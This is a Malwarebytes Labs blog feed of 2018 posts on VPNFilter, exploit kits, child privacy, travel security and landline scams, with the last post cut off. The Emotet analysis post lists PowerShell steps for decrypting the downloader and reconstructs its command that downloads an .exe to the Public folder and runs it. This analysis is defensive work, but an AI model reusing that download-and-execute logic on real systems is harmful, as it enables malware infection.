Subscribe to Malwarebytes feed
The Security Blog From Malwarebytes
Updated: 4 days 17 hours ago

UK law enforcement: an uphill struggle to fight hackers

Fri, 06/15/2018 - 19:02

About 16 years ago in the UK, I walked into a local police station to report a computer crime, because walking into local police stations is how they did things back then. There may well also have been penny farthing bicycles, real pea souper fogs, Mary Poppins, and Jack the Ripper, though I could well be wrong on those last two.

I was greeted at the incident report desk by a bemused officer on duty more used to dealing with stolen bikes or children stuck up trees than anything hacker related, and things went rapidly downhill from his very first question, which was, “What’s an Internet?”

The early days of UK law enforcement and the Internet

I can’t speak for everyone with my solitary anecdote, but even countries that had law enforcement bodies that were was a bit more on the ball with regards all things cyber had their problems, too. I vividly remember being asked to help [redacted entity] with something I’d researched sometime between 2005–08 (being deliberately vague here), resulting in a face-to-face meeting with someone I was half convinced was going to drag me off to a cell. I was helping! You asked me if I could help you! Sadly I can’t say feelings of reciprocal assistance were fostered in any great way, and that’s a shame.

Outside of my own experiences, many security researchers were working in almost total isolation; you couldn’t get ahold of security contacts for major social networks, nobody was on Twitter, huge organisations were missing “contact us” pages, and you were doing very well indeed if you managed to get a dialogue going with, well, pretty much anybody. All communication was done via yelling in blog comments and trying to figure out which people were at security conference dinner queues.

In short, you had hardly anyone talking, vaguely scary law enforcement with technical chops but a general lack of people skills, and officers ready and willing to ask you, “What’s an internet?”.

Frankly, I’m amazed the Internet didn’t burn down into a hole in the ground.

The present day

Things are significantly better now, and many of those problems have been addressed. We have every researcher you can think of available at short notice on sites like Twitter, we have bug bounties/halls of fame, ISPs are a lot more communicative, public facing clearing houses of malware/phishing pages, and most branches of law enforcement have a much better understanding of all things digital.

That’s not to say problems don’t exist, however. A recent report claims British law enforcement is having a tough time of it. If you’ve run into a cyberattack of some kind in the UK, you may find yourself out of luck because apparently only one in three of the 44 police forces in operation are able to deal with computer crime. While police claim some 90 percent of all crime has a digital element to it, their ability to flesh out so-called “cyber units” has been found to be lacking.

Into this already problematic area follows the frequently muddled response to forms of encryption and data privacy. The recent National Crime Agency report on Serious and Organised Crime walked a fine line between acknowledging privacy boons for regular web users, while pointing out the advantage to criminals.

That’s not really a popular line of attack, as it turns out, because the UK government has a thing for wanting to backdoor forms of encryption—and people aren’t really keen on backdoored encryption. Or how about the urge to move into the facial recognition realm, despite a false positive rate of 98 percent? On top of all that, we have this killer quote from a symposium on privacy and corporations:

Tesco probably knows more about me than GCHQ.

While admittedly tongue in cheek, it does raise questions about how much, exactly, we surrender when signing up to membership cards, loyalty accounts, and everything else along the way. Law enforcement would love to get their hands on that kind of profiling, and surveillance capitalism can have major ramifications for societies as a whole.

Essentially, things sound like they’re locked into a stalemate, and no sign of relief seems to be coming anytime soon. And if law enforcement actually is struggling to keep up with datasets and tracking information available to corporations, it’s natural that they’re going to insist on access to all the things, all of the time. At which point, people get rather angry and the cycle repeats itself. Meanwhile, in all of this, the criminals are getting away with all sorts of things.

Wanted: a huge pile of cash

Funding is the be all, end all of UK policing, but with cuts across the board and real-world police numbers down, it’s a hard sell to grab some cash for Internet shenanigans, especially when nobody seems to be entirely clear on what they want to do. Train more police in forensics? DDoS analysis? Malware reversing? Which type of digital attack is likely to be most relevant to the type of police work most commonly seen in the UK? Or, do they want to leapfrog all of that and just go all out on the “Encryption is good for bad people so we definitely want backdoors, thanks” approach?

Who knows, but considering the UK has only pumped £1.3 million into cybercrime training in the last three years, it leaves a lot to be desired. The cash is split between different regions, and that doesn’t go far—as the linked article mentions, North Wales spent £360 on 1,063 individuals to get them trained up from a total pot of £375,448. Meanwhile, there are some regions where a grand total of zero people were trained in aspects of computer crime over a period of three years (perhaps the “What’s an Internet?” officer resides there).

Backup en route

It’s not all bad news. If you could go back in time 16 years and tell me that UK law enforcement would be spending a million pounds on computer crime training, I’d probably be laughing in disbelief until 2018 rolled back around.

Nowadays, there’s plenty of ways to reach the police online, and across a variety of social media. Local and national police websites will often play host to infographics—actual infographics—with useful information on them and everything! There is, at least, money still being invested in the nation as a whole as far as cyberattacks are concerned, to the tune of £1.9 billion over five years to tackle high-level malicious activity.

Even accounting for this, I get the feeling that a bit more money sent to police officers would probably help home users and businesses feel a little more secure and, hopefully, a bit more optimistic that their low-level report to an officer manning the admin desk won’t end up in a large pile of “dunno, lol.”

Imagine a world in which a cyberattack on a home user would result in a phone call to police that actually gets answered and actually gets results. Perhaps it’s only another 16 years away.

The post UK law enforcement: an uphill struggle to fight hackers appeared first on Malwarebytes Labs.

Categories: Techie Feeds

VPNFilter malware still making waves

Wed, 06/13/2018 - 16:15

Last month, a piece of malware called VPNFilter caused chaos for owners of MikroTik, Lynksys, TP-Link, and Netgear equipment. Roughly 500,000 devices worldwide fell victim, with the unwanted parasite able to listen to traffic, steal credentials, damage devices, and more. Until patches started to roll out, the options weren’t great; as one of our researchers, Jovi Umawing told SCMagazine recently:

“While Ukraine is a key target of destabilising cyberattacks for some time now, this particular infection is unlikely to cause issues with the Champions League final. The bigger concern is what people do to combat potential infection; restoring routers to factory settings may eliminate the malware, but it also opens the possibility of becoming vulnerable to older exploits. The best course of action at this point in time is to purchase new hardware, if at all possible.”

That’s right, people were very worried about their football match. And due to the lack of available patches at the time, people were left with the option of running out and buying a new router or sitting around inviting multiple pre-existing, vampire-style exploits over the threshold.

As it turns out, there’s a lot more to consider than who’d end up winning the Champions League, because not only is the threat still around, but it’s also slowly ramping up the problem factor.

VPNFilter: Not gone, and not forgotten

This month, it was revealed the threat was potentially worse than everyone thought, with the ability to attack endpoints otherwise safely hidden behind a firewall. Worse, the number of infected devices has risen from 500,000 to close to one million across 54 countries.

Did you breathe a sigh of relief when initial findings suggested it was “only” 15 to 20 types of router affected, none of which were yours? Well, you might want to stop, because more than 50 others have now been added to the list. A full list can be viewed on the main Talos Intelligence information page.

Make no mistake, VPNFilter malware is highly unpleasant—you don’t want it lurking on your router while it tries to (for example) downgrade HTTPS communications to something unencrypted so it can swipe sensitive data, or snag a list of visited domain names. Everything that goes in and out of a router could potentially be manipulated, so we need to ensure that we do all we can to keep it at bay.

My router is on the list, help!

First thing’s first, don’t panic. One million devices compromised is a big number, but there’s quite a few more routers out there worldwide than one million. The odds of having this ferreting away on your hardware is likely still low. What you need to do is ensure your vendor has rolled out an update to their firmware and apply it.

Sometimes devices don’t install updates with zero user interaction, and you may have to dig around on the product website. This is somewhat rare these days, from my experience at least. At most, you may be redirected or face a pop-up telling you to get on with things and give consent to an update.

Worst case scenario, no patch is available, and you’re stuck between deciding whether to risk sitting around with VPNFilter on your box, or rolling everything back to factory reset condition and potentially being vulnerable to older exploits.

Something to keep in mind is that router features can vary wildly, even when faced with two devices from the same manufacturer. Here’s how a basic bit of updating from Netgear works, for example, but some routers I’ve dealt with can be an absolute mess of poorly laid out tabs and menus which lead nowhere. Keep a search engine handy along with a pen and paper, just in case.

Routers should come out of the box running everything required to keep you and your data secure, but even then, you’ll probably find default logins all over the place. If nothing else, VPNFilter may have inadvertently caused us all to go back and shore up the security of our magical Internet boxes in a more general fashion. Even if VPNFilter never existed, you’ll still probably want to take advantage of secure logins, killing off unwanted services, optimising firewalls, and maybe even turning it off while out to reduce your target size and also save a bit of electricity in the bargain.

It’s not over yet…

Dealing with router issues can be worrying—even those familiar with locking down every aspect on a desktop might not have the faintest idea about the blinky-light box in the corner of the room keeping the traffic moving. That’s perfectly understandable, so don’t feel bad about it. As you can see from the links up above, there’s plenty of resources to sink your teeth into. You can bet that more VPNFilter antics will be in the news over the coming weeks, so keep up to date with the latest happenings. And if your router should end up on one of the affected devices lists, contact your supplier as soon as you possibly can.

The post VPNFilter malware still making waves appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Exploit kits: Spring 2018 review

Tue, 06/12/2018 - 19:04

Since our last report on exploit kits, there have been some new developments with the wider adoption of the February Flash zero-day, as well as the inclusion of a new exploit for Internet Explorer. We have not seen that many changes in the drive-by landscape for a long time, although these are the results of improvements closely tied to malspam campaigns and exploits embedded within Microsoft Office.

Since both Flash and the VBScript engine are pieces of software that can be leveraged for web-based attacks, it was only natural to see their integration into exploit kits. While Internet Explorer is not getting any younger, CVE-2018-8174 brings an update to an otherwise 2-year-old vulnerability (CVE-2016-0189), which is still used in some drive-by campaigns. As far as Flash is concerned, CVE-2018-4878 has been adopted by almost all exploits kits. At the time of this writing, a newer Flash vulnerability (CVE-2018-5002) is available but has not been spotted in any EK so far.


RIG exploit kit remains the most commonly observed EK in the wild, with several different campaigns in action. RIG was the first to include the new VBScript engine exploit (CVE-2018-8174) in IE only days after a Proof of Concept became publicly available, on top of adding CVE-2018-4878. RIG has pushed various payloads such as Bunitu, Ursnif, and the popular SmokeLoader.


GrandSoft is an IE-only exploit kit which is observed in a smaller range of distribution campaigns, mostly via malvertising on adult sites. In comparison to its counterparts, GrandSoft is still relying on the older Internet Explorer exploit (CVE-2016-0189) and lacks the obfuscation we normally see in landing pages. Some payloads pushed by GrandSoft include the AZORult stealer.


The South Korea–focused exploit kit is back to using its trusted EK Magniber after having a short stint with GandCrab ransomware. Magnitude added Flash (CVE-2018-4878) and went on to integrate IE’s CVE-2018-8174 after a hiatus of about a week with no activity. With its own Magnigate filtering, Base64-encoded landing page and fileless payload, Magnitude is one of the more sophisticated exploit kits on the market.

GreenFlash Sundown

The elusive GreenFlash Sundown continues to strike via compromised OpenX ad servers. Although it is usually seen distributing the Hermes ransomware, 360 Total Security observed a cryptocurrency miner via several Chinese websites running a vulnerable OpenX version. The ad banner used by GF Sundown in this attack, as well as some we documented before, is a Korean language picture that hides CVE-2018-4878 using steganography.

A busy 2018

There is no doubt that the recent influx of zero-days has given exploit kits a much-needed boost. We did notice an increase in RIG EK campaigns, which probably resulted in higher than usual successful loads for its operators. While attackers are concentrating on Microsoft Office–related exploits, we are observing a cascading effect into exploit kits.

So far, 2018 has been busier than usual with the discoveries of several directly applicable zero-days, and we can expect to see more in the coming months. For instance, we have already witnessed back-to-back Flash zero-days where attackers are capitalizing on ActionScript vulnerabilities.


We tested these exploit kits against Malwarebytes, and they were all blocked thanks to our signature-less anti-exploit engine:

Hashes for samples referenced in this post:


8CA1DEDCED7332AEDC94291F8DAA82E0837A1EFC612B581DD13165B29F2A6DBB 21358ACDEB60C456BC36B8E3481BF66CC5F4167D5994F097F71798341B9119FB 560031AC4C947B1E168704CA5E323BF00A801E2320E1F0FFFE08392179D38391 AC1FF2B2A18931C17A5D9D0305CE72CC69C1688DFC2BDF4BF74AA9E27123BFFD



Magnitude (dumped from memory with PE-Sieve)


GreenFlash (dumped from memory with PE-Sieve)


The post Exploit kits: Spring 2018 review appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Internet Safety Month: How to protect your child’s privacy online

Tue, 06/12/2018 - 17:44

June marks the beginning of summer. It is also National Internet Safety Month.

This is the perfect time to remind vacationers that while it is essential to check that everything you need is packed and ready for a trip, it is equally vital for the family to take steps in securing their devices and their online footprint. We’re talking about managing online privacy and reputation—for you and especially for your children.

So to celebrate Internet Safety Month, we’ll be pushing out a two-part series tackling the concepts mentioned above. In part 1, we’ll be talking about online privacy geared toward kids and teens. So parents and guardians, whip out that pen and paper—or a note-taking app, if you like—and start taking notes.

It is essential we protect our children’s privacy online

Parents, you know this. When they were young, we trained our kids not to talk to strangers—unless they’re the police or someone on the line handling emergencies, such as a 911 dispatch officer. We tell them not to accept anything from anyone they don’t know or are unfamiliar with. We remind them not to wander off too far from where you can see them. We sternly order them not to go to dark alleyways. We encourage them to go to places accompanied by a person you both trust.

It’s natural for parents and guardians to keep their child safe and as far away from physical harm as possible. That hasn’t changed, and is equally true for the digital world—especially when our kids have coexisting physical and digital lives.

What kids (and some adults) probably don’t realize is that there are real-world consequences for the things they do online. This something we should keep reminding our kids about as they grow up. Truth be told: It’s relatively easy to forget what’s at stake if we can get what we want quickly and with relative ease. And more often than not, kids won’t think twice about giving personal info away.

If we don’t take our child’s online privacy seriously, they may end up in serious digital trouble, or worse: end up getting emotionally or physically harmed.

When it comes to criminals going after children’s personal details, identity theft is something that parents should worry about. The sites you navigate to may be child-friendly, but that doesn’t mean they take extra care of your child’s info (the same way other companies handle data of parents and other adults).

The security of these sites may or may not be terrible, but unfortunately, they lean mostly toward the former. Case in point, the VTech breach of 2015. Fortunately, the anonymous hacker who exposed flaws in the toy maker’s websites is motivated to stop anyone from taking advantage of parents and children’s data. The outcome of the story might have been different if data were found in the hands of criminals.

Sharing too much information online, such as their current whereabouts and what they’re doing, is also dangerous to children, as this may invite stalkers and spies. Your child could also lose out on opportunities if they share compromising images of themselves publicly. Such photos could cost them a college admission, a new job, a grant or benefit claim eligibility, and other public and private services your child may want to apply for in the future. Furthermore, this could escalate to bullying, labeling, and humiliation.

What you can tell your kids to protect their privacy online

While most parents focus on personal privacy when it comes to online matters, remember that there is also what we call consumer or customer privacy. Your kids are already using and consuming services and software programs available online, whether they’re labeled free for use or not. This means that they also need to exercise the right to protect this type of privacy, too. Customer privacy centers on data companies collect about their users, regardless of age, whenever users interact with their sites. Taking the steps we prescribe below can help address the security of your child’s personal and consumer privacy:

“There is information you can share and cannot share online about you, your friends, and other people around you.” Guide your kids on which information, videos, photos, or posts from others to share or not share. Your home address, the name of the school they attend, your landline number (if you, dear parent, still have one in the house), and email address are examples of data they should never share publicly online. On the other hand, safe selfies, cat pictures, and funny GIFs are harmless to share. The family recipe that has been passed on from generations before? Well, you may want to ask granny about that first.

Read: Users with landlines are more vulnerable to scams

“Timing is everything.” Yes, that age-old adage that has been uttered numerous times applies here, too. If and when your teen cannot avoid sharing information about where they are and what they’re doing, the very least they can do is delay posting about, say, being on family holiday at the Maldives for a fortnight. This way, once you’re all back safe at home, not only is a potential burglary prompted by a social media post avoided, but your teen can still relive their experiences with friends online. In this way, it’s almost like extending the vacation fun a little bit longer.

“Check your social media settings or possible privacy policy changes you might suddenly be defaulted to.” Businesses that market to children are, by law, required to have a privacy policy included in their terms of service. Informing their young users is also compliant with Children’s Online Privacy Protection Act (COPPA) standards. However, due to activities that may keep the child busy and make them miss said notifications in time, it is good practice to make time to review online account settings on a regular basis.

“Familiarize yourself with laws that protect your online privacy.” Of course, parents should do this, first and foremost, before they can pass on what they know to their kids. Keep your language simple and understandable. Acquainting your kids with laws can also give them insights on what information, as consumers, they can share or withhold from companies that ask data from them. You can start with COPPA. Introduce them to online privacy laws governed by your home state, as well.

“I’ll walk you through the privacy settings of your social media accounts.” When you think your child is at the right age and ready to have a social media account, set one up together and spend as much time as you can walking them through and helping them understand the various privacy settings on offer for that particular platform. This may also be an excellent opportunity to offer them additional tips, if, for example, they receive friend requests from someone outside their circle.

“Read up on news about the platforms you use.” This is to foster awareness about what can potentially happen online if they’re not careful with their information.

Privacy, monitoring, and apps: A “tough love” story

Parents of young children often monitor their kids closely, minding every website they visit or every video game they play with others online. But for some parents of tween and teens, continuing to do this may seem optional now. After all, they’re growing up to be more independent and getting savvier with their online habits. They know when to stay away from something, right? Some of these parents may even stop keeping tabs on their kids completely for fear of being labeled “creepy” and “weird.” Worse, they’d be called out for “violating their child’s privacy.”

It’s a parent or caretaker’s ethical, moral, and legal obligation to keep their children safe. And whether kids like it or not, this extends to their digital lives. So before a new smartphone or tablet is handed over, three things should have already been established: first, the parent or caretaker must assess that the child is mentally and emotionally mature enough to own and take responsibility for a device; second, there is open communication between parent and child about online activities; and, third, there is an agreement about expectations for how the device will be used, including amount of time and which types of sites will be visited.

Once the device is handed over, require that your child come to you immediately if she encounters something that seems fishy online. On the flip side, it’s important to establish trust between caretaker and child. It would be wise for parents to always ask their child’s permission first before looking through their devices. And when it comes to using monitoring apps, they should also inform their child before installing.

Children must realize that while they are dependents, they don’t get to keep their online (or other) activities 100 percent confidential. Depending on the circumstances, for example, if the parent’s instincts tell them something is off or their child might be in danger, sometimes privacy must be ignored in favor of keeping the child out of trouble.

Children must also realize that just because they get checked up on every now and then doesn’t mean their parents don’t trust them. More often than not, it’s the people they’re interacting with online that parents don’t trust. They can’t meet these people in person and determine their character for themselves. Plus, allowing your kid to go on the Internet is not the same as allowing your kid to hang out at the mall for a couple hours. It is definitely not always a safe place—especially if the proper precautions aren’t adhered to. Children need extra care and proper guidance when it comes to navigating the Internet.

Let’s stop and talk a while

When it comes to managing a child’s digital life, both adult and child must work together toward the common goal of acceptable online privacy and general security. While there is technology available that can aid parents when it comes to looking after their children’s well-being online, these should only be treated as supplemental and not a replacement to a relationship grounded in good communication. Both parties must be open to one another about what’s troubling them and what makes them uncomfortable, without judgment. Doing otherwise may result in children closing their doors and choosing to talk to others instead of their parents when they have problems online. Parents must recognize this, too, and come up with better ways to communicate with their child.

Raising digital natives isn’t easy now, and will probably be even more difficult in the future. Soon, they’ll be wearing our shoes and raising children of their own—a second or third generation of natives. We can only guess what life will be like then. But until then, it is crucial for parents to consider normalizing the concept of online privacy protection for their own good, and for generations to come.

Other related posts:

The post Internet Safety Month: How to protect your child’s privacy online appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (June 4 – June 10)

Mon, 06/11/2018 - 16:02

Last week on Labs, we took a look at hidden mobile ads, the perils of social media spam, and how to shore up your landline defenses. We also took a deep dive into Emotet malware analysis, and gave you some summertime safety tips.

Other news

Stay safe, everyone!

The post A week in security (June 4 – June 10) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Tips for safe summer travels: your cybersecurity checklist

Fri, 06/08/2018 - 15:00

Summer is just around the corner in the Northern Hemisphere, and with it comes vacation plans for many. Those looking to take some time away from work and home are likely making plans to secure their home, have their pets taken care of, and tie up loose ends at work. But how about securing your devices and your data while you’re away? Here are some things to take into consideration if you want to have a trip free of cyber worries.

Before you leave

Some of the things on your cybersecurity checklist can be taken care of before you leave. They include the following:

  • Make sure the operating systems and software on all the devices you are going to take along with you are up to date. Having to install updates while you are on the road can be a pain due to slow and unstable connections. Use your at-home Wi-Fi, which you know is secured with a password. (Right? If not—do that right away.)
  • You may want to take precautions to secure devices that you’ll be leaving behind in your workplace and home. If a burglar gets hold of your desktop, they should not be able to harvest any valuable data. All devices should be password protected (including the ones you are taking along with you).

  • Back up the valuable data on the devices you are bringing so that if you lose them, it won’t be a double disaster.
  • Do not announce the dates of your upcoming travel plans on social media. That’s a great way to alert criminals to case your house and break in during the time you’ll be gone. Post your travel pics when you get back. They will still be cool.
  • Disable the auto-connect options shortly before you leave and have your devices forget the network SSIDs in their lists. Threat actors can abuse these features for man-in-the-middle attacks.
  • If you have contactless debit and credit cards, get shields in which to store them so you can carry them around without leaking information.
  • Think twice about bringing a multitude of devices. The chances of anything getting damaged, stolen, or lost are much higher when you’re on the road.
  • Make sure your travel insurance covers all the devices and any other valuables you plan to take along.
While you are traveling

Travel plans can range from road trips to a nearby camping spot to flights to five-star beach resorts. Because of the wide range of travel options, some of the following advice may or may not apply:

  • If you park your car at the airport, obviously make sure no valuable devices are left behind. This is also a good time to disable the Bluetooth of your phone, because the car is probably the only useful Bluetooth connection you need. And when Bluetooth is off, it can’t be abused.
  • Airports and other waypoints on your travels will often offer public, free, and unprotected Wi-Fi. Consider the risks associated with them when you use them, or use a VPN to enhance the security by encrypting your connection.
  • If you need to use Wi-Fi at your hotel, make sure their connections are secured with passwords. And if you need to access sensitive material for work, set up VPN on your laptop beforehand.

  • Privacy screens make sure that only the person sitting straight in front of the screen can read what is on it. This can stop people from secretly watching what you are doing. Good privacy screens are easy to apply and are available for laptops and many handheld devices.
  • Don’t use public computers for sensitive Internet traffic. This certainly includes online shopping and any other financial transactions. While you are traveling, it’s safer to spend money at your destination instead of online.
  • If you use webmail to read your mail when you are away from home, keep in mind that this may be less secure then reading the mail in your favorite email client. Some webmail services have html enabled by default.
  • Use a fully updated anti-malware solution for all your devices. Malwarebytes has solutions for many operating systems and types of devices.
  • Since you may not want to take your laptop and every other device with you as you go sightseeing, make sure there is a safe place to keep the items left behind. Not every hotel safe is big enough for a laptop. Ask your hotel concierge if they have other options for securing devices. Simply leaving them behind in your room is not the safest move.
If you travel abroad

Some extra attention to detail may be required when you travel abroad.

  • Make sure you leave your country with the devices fully charged. You may need to use them for a while before you get another chance to re-charge. It may require different cables, power plugs, and adapters to charge your devices at your destination or checkpoints along the way. Come prepared.
  • Not only the US, but also some other countries will look at your social media accounts to find any information that could make you a less welcome guest. It might be prudent to remove any questionable comments to thwart further investigations.
  • If traveling into the US from abroad, be prepared that you might be asked to hand over your device and your password to get in. Make sure there is nothing to be found on it that you don’t want to be found.
When you get back

Back home safe and sound? Don’t rest yet. Check a few more things and then you can start posting online about your relaxing, fun, and incident-free vacation.

  • Update your anti-malware solution and run manual scans on your devices to check for any uninvited guests you may have picked up on the road.
  • If you bought devices abroad, check them for compliance and whether they are compromised. In some countries, devices are sold with monitoring software pre-installed.
  • Check your bank account for any unexpected withdrawals or spending. Warn your bank or credit card provider if you suspect foul play or if you have lost sight of your credit card at some point. it’s especially important to do this if you suspect your login credentials may have been stolen.
  • As an extra precaution, you may want to change the passwords that you used during your time away. If someone managed to get ahold of one during your trip, you’ll stop them from doing any damage with a changed password.
Don’t let all this ruin the fun

While most of the things mentioned above are precautions we (should) take every day, they are not the first ones that come to mind when you are planning that awesome trip you have worked for all year. But as always, it’s better to be safe than sorry.

Recommended reading: 7 tips to stay cyber safe this summer

Safe travels!

The post Tips for safe summer travels: your cybersecurity checklist appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malware analysis: decoding Emotet, part 2

Thu, 06/07/2018 - 15:00

In part two of our series on decoding Emotet, (you can catch up on part 1 here), we’ll cover analysis of the PowerShell code. Before we do that, however, it is a good idea to list some of the functions and calls that are used in the code for the execution.

  • System.Runtime.InteropServices.Marshal: used for memory management
  • SecureStringToBSTR: used to convert the secure string to decrypted data
  • ConvertTo-SecureString: used to convert the encrypted data into secure string
Encryption and PowerShell

There are a couple of ways to encrypt data using PowerShell. DPAPI (Data Protection Application Programming Interface) is one method of encrypting with PowerShell, but it’s not what our malware uses. Emotet downloader malware uses AES to encrypt data. So let’s take a look at how AES works.

If the data is encrypted using ConvertTo-SecureString but with NO key, PowerShell will by default use DPAPI. But it will only work for the logged in user on the machine it was encrypted on.

If the data is encrypted using ConvertTo-SecureString with a key, PowerShell will use AES to encrypt the data and it can be decrypted on any machine, by anyone who has the encryption key. Emotet downloader uses AES for encrypting the code, with the key hardcoded in the malware itself.

Code execution flow

In order to get to the encrypted code, we need to first understand the flow of execution. Let’s have a look at how the code is structured.

Code structure


From the snippet above, we need to extract useful code and then re-construct the structure so that we can follow the execution-flow and decrypt the code.


Code analysis

Now that we have a usable code structure, we can move on to the next step.

The code above is looking for an encrypted data string that can then be run through SecureString for decryption.

We now have access to the encrypted data from the VBA.


We will take that encrypted code and run it through ConvertTo-SecureString to start the decryption process.

Since the data string is so long, it is a good idea to first save it as a file and then pass it to a variable in PowerShell.

For the purpose of this analysis, we’ll save it as encrypted_code.txt.

Now, we’ll pass it to a variable $vEncrypted:

$vEncrypted = [IO.File]::ReadAllText(“absolute_path\encrypted_code.txt”)

There are different ways to achieve the same result. Get-Content can also be used.

Next, we run it through ConvertTo-SecureString to convert the encrypted string into a SecureString:

$vDecrypted = ConvertTo-SecureString -String $vEncrypted -k (key goes here)

NOTE: The malware authors would have previously used “ConvertFrom-SecureString” with a key (now hard-coded into the malware code) to encrypt the data. We’re simply reversing the process to extract the encrypted code.

The last step is to now Marshal the SecureString through the SecureString to get the decrypted code.

We’ll store the result in a variable to keep it clean and simple.

$vResult = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($vDecrypted))

Note that we have used SecureStringToBSTR instead of what the malware authors are using (SecureStringToGlobalAllocUnicode). The reason for this is that BSTR converts SecureString string value to a binary string (BSTR) recognized by COM. SecureStringToGlobalAllocUnicode would work as well.

That’s it. $vResult should now have the completely decrypted code with the payload URLs.

Step-by-step analysis

Now that we know the code flow, let’s run it in PowerShell and put all the knowledge we have gained by analyzing the code to work.

First of all, we’ll pass the encrypted code to the variable $vEncrypted:

As you can see below, the encrypted data has now been stored in our variable vEncrypted:

The next step now is to convert the encrypted data into SecureString by running it through ConvertTo-SecureString function. We will use the key that we found hard-coded into the malware code. We will pass the output to the variable vDecrypted:

In the next step, we will confirm if the conversion was successful or not. As we can see below, the conversion was successful:

Now, the final step to decrypt the data is to Marshal it through SecureStringToBSTR and pass the output to a variable, in this case, vResult:

It’s now time to print the output of the variable and look at the decrypted code!

We will further execute the code to extract the payload URLs and print them to console in a clean and nice way. As we can see in the code, variable $ADCX holds the URLs. We will use the split function as shown in the decrypted code and pass the output to $ADCX.

All we have to do now is print the value of $ADCX to console and we get all the URLs in a list.

We already have the network IOC. At this point, we can go home! But do we ever?

Reconstructing the command-line arguments

Let’s reconstruct the full command-line arguments, mostly as a reward for completing the analysis!

Here’s our PowerShell code, structured and readable:

And here’s the same code, cleaned and beautified:

Now, we will look at all the variables and analyze them one-by-one to reconstruct the complete command-line arguments.


This variable is assigned the value as the output of (new-object) random, which translates to System.random.

Later in the code, this variable will be used to generate a random value (between 10,000 and 282,133) to be used as the file name for the downloaded payload. We’ll see that in action when we analyze $NSB.


This variable is assigned the value “(new-object) System.Net.WebClient,” which will be used later with DownloadFile to download content from the Internet with the specified URI and save it as a local file. We can have a look at the value assigned to the variable in the image below. These are the attributes that will be used to start the download of the payload.


As we saw earlier, this variable calls on the previously declared variable “nsadasd” in conjunction with “.next”, which turns the argument into the method “” This, in turn, would return a random number within the specified range (in this case, 10,000 – 282,133). As you can see below, it returns a different value each time it is executed.


$SDC = $env:public + ‘\’ + $NSB + (‘.exe’);

This variable puts together the absolute path for the payload, complete with the file name that is generated by variable NSB.

We have already looked at the $ADCX variable and how to extract the URIs out of it. Now let’s reconstruct the entire command-line argument that is passed to the system for the malware to successfully download the payload, save it to local file, and execute it.

Here’s the way the code is executed by the malware using variables we analyzed above:

Let’s clean up the code to make it more readable:

Now that we know the value that these variables hold, let’s reconstruct the final command-line arguments that will be passed to the system for execution:

This is what it comes down to in the end:

(New-Object) System.Net.WebClient.”DownloadFile”(”ToString”(), C:\USers\Public\264415.exe);

The command we have above will initiate the download of the data from the specified URI and save it to a local file as “C:\USers\Public\264415.exe”.


And this final command will start the execution of the payload.

Emotet: a complex malware

Emotet is one of the most active threats seen in the wild, with campaigns serving this malware daily to potential victims across the globe. The level of code obfuscation and encryption used to hide the code is quite complex and well-executed. In fact, it is one of the most complex downloaders in circulation.

That’s why we felt it was so important to help audiences understand Emotet in sufficient detail so that code variations or other changes in the future do not pose any major challenges to analysts trying to decode this malware. The more you know, the better and faster you are able to protect users from sophisticated malware attacks.

The post Malware analysis: decoding Emotet, part 2 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

PSA: Users with landlines are more vulnerable to scams

Wed, 06/06/2018 - 15:00

It’s time to have “the talk” with your parents, relatives, and loved ones. Anyone still using a landline must be warned: having a home phone makes you particularly vulnerable to scams.

We know here at Malwarebytes that our readers are often the unofficial “IT” department for their families, relatives, and friends. While suggesting to your folks that they discontinue having a landline might not go over well, we still need them to at least be wary of that telephone and the types of calls they might receive on it.

What was once an essential communication tool is now a gateway into your home—a scam delivery mechanism.

Looking at all the inbound calls that my relatives with landlines were receiving left me with a sneaky suspicion that they must have landed on a “victim list” of sorts. Types of scam calls included:

  • Tech support scams (as many as several times a day)
  • Robocalls
  • Charity requests (some more dubious than others)
  • Political calls
  • Surveys
  • IRS/Bank/FBI/Police scams (more tax scams during tax season)

While they do not wish to part with their landlines, I have investigated some other possible solutions for my relatives to avoid scams.

I found some call blocker hardware. However, reviews indicated that this wasn’t particularly effective against scammers. For example, this solution wouldn’t stop tech support scammers that spoof residential numbers.

I also found another device that requires a password before allowing the phone to ring from all inbound calls.

Neither of these felt like an acceptable solution.

Ultimately, knowledge is power, so I’m choosing to explain all the scams that they encountered. In addition, I’d like to point out our tech support scam resource page.

Microsoft tech support

The standard, tried and true tech support scam. These are either initiated from a cold call, “Hi, I’m from Microsoft!” or by driving potential victims to make a call to “Microsoft tech support” themselves after being served a malicious pop-up or browser locker with the specific intent of tricking users into thinking their computer is infected. and they need to pay tech support to fix it.

This scam has many variants. The scammers will claim to be the official support for any number of security products. They will try to impersonate Microsoft or other antivirus companies. They have even tried to impersonate Malwarebytes.

There’s a simple fix for this scam. If you get a call from “Microsoft,” hang up immediately. They will never call you. There is no “Internet Tech Support,” and your connection is not monitored for emanating threats.

Note that Microsoft does not send unsolicited email messages or make unsolicited phone calls to request for personal or financial information, or fix your computer.

Unfortunately, most scammers have now switched to pop-ups driving the victims to initiate the call. Even worse, browlocks or browser lockers that effectively prevent further use of the computer is on the rise.

Banks, FBI, police, and the IRS

Scammers will impersonate institutions of authority.

These types of institutions almost never call. If they do, simply ask for their name and their department, and inform them you will call them right back. If they politely say they understand and give you their information, there is a good chance this is a legitimate call. (Keep in mind that it is extraordinarily rare for the FBI, banks, IRS, or police to initiate a call.)

Use the Internet to double-check the number to call back. The scammers may try to be helpful and provide you with theirs, but a quick Google search of their phone number can tell you where they’re calling from (and if that matches with where their company headquarters is located).

If the person on the other end of the line gets angry or starts threatening you, guess what? They’re a scammer. Remember, they’re trying to instill in you a sense of urgency in order to override your common sense.

Stranded grandchildren

An especially heinous scam, this variant targets grandparents using classic psychological manipulation. The scenario is that their grandchild is calling from jail, arrested for disorderly conduct, and this is their one phone call. Sense of urgency? Check. Fear for a loved one? Check. Common sense thrown out the window? Check.

This scam usually tries to get Grandma to send money “for bail” via MoneyGram or Western Union.

So what happens if you get a call from someone claiming to be your grandchild stuck in jail? Well, much of this scam relies on grandparents being less in-the-know about their grandkids. Do they know what her voice sounds like? Her phone number? Would she never be arrested for disorderly conduct?

